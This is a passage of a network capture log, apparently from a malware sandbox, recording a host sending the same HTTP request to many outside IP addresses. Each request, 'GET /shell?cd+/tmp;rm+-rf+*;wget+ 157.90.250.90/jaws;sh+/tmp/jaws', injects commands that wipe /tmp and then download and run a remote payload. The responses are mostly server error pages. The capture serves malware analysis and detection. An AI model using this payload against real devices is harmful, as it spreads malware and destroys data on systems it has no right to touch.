                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          148192.168.2.233305231.30.58.13380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:10.909502983 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          149192.168.2.2356368185.179.157.10280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:10.926343918 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:11.194081068 CET913INHTTP/1.1 400 Bad Request
                                                          Connection: close
                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                          pragma: no-cache
                                                          content-type: text/html
                                                          content-length: 681
                                                          date: Tue, 02 Jan 2024 05:24:11 GMT
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          150192.168.2.2336382154.46.166.18880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:10.948724985 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:11.238642931 CET211INHTTP/1.1 301 Moved Permanently
                                                          Location: https://127.0.0.1/shell?cd+/tmp;rm+-rf+*;wget+%20157.90.250.90/jaws;sh+/tmp/jaws
                                                          Content-Length: 0
                                                          Date: Tue, 02 Jan 2024 05:24:10 GMT
                                                          Server: airCube


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          151192.168.2.2344342169.53.132.23480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:10.994020939 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:11.855066061 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:12.879029036 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:14.894752026 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:19.086062908 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:27.276901007 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:43.402621984 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:17.445835114 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          152192.168.2.23376782.135.71.17680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:11.112669945 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          153192.168.2.2360000195.62.126.5480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:11.155987978 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:11.402542114 CET322INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:24:11 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          154192.168.2.2349306200.159.177.3180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:11.224155903 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:11.499591112 CET336INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.14.2
                                                          Date: Tue, 02 Jan 2024 05:24:11 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 169
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.2</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          155192.168.2.235267249.232.101.10423
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:11.684170961 CET171INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 34 3a 31 31 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:24:11Auth Result: ????.


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          156192.168.2.235270249.232.101.10423
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:12.525722980 CET171INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 34 3a 31 31 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:24:11Auth Result: ????.


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          157192.168.2.235270849.232.101.10423
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:13.219901085 CET171INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 34 3a 31 32 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:24:12Auth Result: ????.


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          158192.168.2.235809662.254.208.1080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:13.764312029 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:15.118623018 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          159192.168.2.2360130150.60.155.8080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:13.765423059 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:15.118643045 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:15.377147913 CET427INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:24:15 GMT
                                                          Server: Apache
                                                          Vary: Accept-Encoding
                                                          Content-Length: 226
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          160192.168.2.2347120188.128.206.16880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:13.779989004 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:14.052931070 CET285INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:24:13 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 128
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 6f 70 73 21 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>Oops! 400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          161192.168.2.2346624104.105.18.18280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:13.802828074 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:15.342601061 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:15.638148069 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:24:15 GMT
                                                          Date: Tue, 02 Jan 2024 05:24:15 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 66 30 38 36 61 37 63 26 23 34 36 3b 31 37 30 34 31 37 33 30 35 35 26 23 34 36 3b 33 32 39 65 34 65 65 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;af086a7c&#46;1704173055&#46;329e4eef</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          162192.168.2.2333136154.92.226.19980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:13.806613922 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:14.106601954 CET307INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:24:13 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          163192.168.2.2356586191.96.205.19480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:13.903879881 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          164192.168.2.235639223.204.125.10680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:13.920038939 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          165192.168.2.234093638.132.215.4480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:13.920459986 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          166192.168.2.235271449.232.101.10423
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:13.959103107 CET171INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 34 3a 31 33 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:24:13Auth Result: ????.


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          167192.168.2.233317699.16.143.12880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:14.071830034 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:14.225964069 CET322INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:03:11 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 162
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          168192.168.2.2350616104.111.199.19580
                                                          TimestampBytes transferredDirectionData
